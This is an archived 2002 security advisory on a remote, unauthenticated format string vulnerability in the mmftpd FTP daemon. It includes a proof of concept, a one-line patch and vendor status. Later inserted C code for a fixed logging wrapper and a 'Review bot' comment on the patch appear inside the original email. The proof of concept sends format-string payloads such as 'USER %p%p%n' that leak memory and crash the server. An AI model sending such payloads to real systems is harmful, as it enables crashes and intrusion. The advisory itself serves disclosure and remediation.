From: Benoît Roussel (benoit.rousselintexxia.com)
Date: Wed Jun 12 2002 - 07:58:37 CDT

    ________________________________________________________________________
    SECURITY ADVISORY INTEXXIA(c)
    04 06 2002 ID #1053-040602
    ________________________________________________________________________
    TITLE : mmftpd FTP Daemon Format String Vulnerability
    CREDITS : Guillaume Pelat / INTEXXIA
    ________________________________________________________________________

    SYSTEM AFFECTED
    ===============

            mmftpd <= 0.0.7

    ________________________________________________________________________

    DESCRIPTION
    ===========

            "mmftpd is a secure FTP server that runs as a normal user, and
    supports virtual users only. Each user may have specific permissions,
    including the maximum home directory size limit and download/upload
    speeds. It runs on both BSD and Linux systems, and is ideal for a setup
    with many Web virtual host customers. It was written from scratch, with
    no borrowed code."

            The intexxia laboratory found a remotely exploitable format
    string vulnerability in the mmftpd FTP daemon.

    ________________________________________________________________________

    DETAILS
    =======

            There is a format string vulnerability in the 'mmsyslog()'
    function of the 'mmftpd' program. When '__GLIBC__' is defined, this
    function acts like 'vsyslog()': it calls 'syslog(3)' with a format
    string that can be controlled by a remote user. No authentication is
    required to exploit this vulnerability.

    Successful exploitation of this flaw can allow a remote user to obtain
    a local account on the target machine.
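    As an added illustration that is not from the advisory or from mmftpd's own source: a hypothetical stand-in for the logging wrapper after the fix (writing to a caller-supplied buffer instead of syslog(3), so it can run stand-alone), together with a defender-side check that counts printf conversion directives in an untrusted field such as the FTP USER name. Names (mmsyslog_fixed, log_sink, count_format_directives, failed_login_line) are assumptions for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define LOG_BUFSZ 1024

/* Stands in for syslog(LOG_NOTICE, "%s", buf) from the patch: the already
 * formatted message is an argument of a fixed format, never the format. */
static void log_sink(char *out, size_t outsz, const char *msg)
{
    snprintf(out, outsz, "%s", msg);
}

/* Hypothetical post-fix wrapper: fmt comes from the program (a literal),
 * user data only ever flows in through the %s arguments. The user string
 * is therefore copied verbatim, and its own '%' sequences are never
 * interpreted by a format function. */
void mmsyslog_fixed(char *out, size_t outsz, const char *fmt, ...)
{
    char buf[LOG_BUFSZ];
    va_list lst;

    va_start(lst, fmt);
    vsnprintf(buf, sizeof buf - 1, fmt, lst);   /* 1023, as in the patch */
    va_end(lst);
    log_sink(out, outsz, buf);
}

/* Defender-side check: number of conversion directives in an untrusted
 * string. "%%" is a literal percent sign and is not counted. A non-zero
 * result in a field that may reach a format function (such as an FTP
 * user name) is worth alerting on. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {      /* skip the escaped percent */
            s++;
            continue;
        }
        n++;
    }
    return n;
}

/* Build the "Failed login" line the way the fixed daemon would and report
 * how many directives the supplied user name contained. */
int failed_login_line(char *out, size_t outsz, const char *user)
{
    mmsyslog_fixed(out, outsz, "Failed login for %s (unexisting)", user);
    return count_format_directives(user);
}
```

With the fixed wrapper, a user name of "%p%p" is logged literally rather than being expanded into stack pointers as in the advisory's log excerpt.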

    ________________________________________________________________________

    PROOF OF CONCEPT
    ================

    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
    USER %p%p
    331 Password required for this user
    PASS foo
    530 Invalid login

    In the log file:
    mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    Connected to test.lab.intexxia.com.
    Escape character is '^]'.
    220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
    USER %p%p%n
    331 Password required for this user
    PASS foo
    Connection closed by foreign host.

    test:~$ telnet test.lab.intexxia.com 21
    Trying x.x.x.x...
    telnet: Unable to connect to remote host: Connection refused

    ________________________________________________________________________

    SOLUTION
    ========

    The following patch corrects this issue:

    diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
    - --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
    +++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun 4 11:25:03 2002
    -70,7 +70,7
      va_start(lst, fmt);
      vsnprintf(buf, 1023, fmt, lst);
      va_end(lst);
    - - syslog(LOG_NOTICE, buf);
    + syslog(LOG_NOTICE, "%s", buf);
         }
     }
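    Review bot: as quoted, this patch will not apply with patch(1): the "- ---" and "- - syslog" prefixes on the file header and the removed line are PGP clearsign dash-escaping, and the hunk header "-70,7 +70,7" has lost its "@@" delimiters, so strip the escaping (or let the signature verification tool do it) before applying. The one-line change to syslog(LOG_NOTICE, "%s", buf); is the right remedy, since buf holds already formatted, remotely influenced text; as the DETAILS section says this vsyslog-like path is taken only when __GLIBC__ is defined, the non-glibc branch of mmsyslog(), which is not shown in this hunk, should be checked for the same pattern.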

    A new version including this patch is available at the following URL:
    http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz

    ________________________________________________________________________

    VENDOR STATUS
    =============

            04-06-2002 : This bulletin was sent to Matthew Mondor.
            05-06-2002 : Matthew responded quickly and confirmed the
                         vulnerability. He released a new version.

    ________________________________________________________________________

    LEGALS
    ======

            mmftpd is a registered trademark.

            Intexxia provides this information as a public service and "as
    is". Intexxia will not be held accountable for any damage or distress
    caused by the proper or improper usage of these materials.

            (c) intexxia 2002. This document is property of intexxia. Feel
    free to use and distribute this material as long as credit is given to
    intexxia and the author.

    ________________________________________________________________________

    CONTACT
    =======

    CERT intexxia certintexxia.com
    INTEXXIA http://www.intexxia.com
    171, av. Georges Clemenceau
    92024 Nanterre Cedex - France
    Standard : +33 1 55 69 49 10
    Fax : +33 1 55 69 78 80
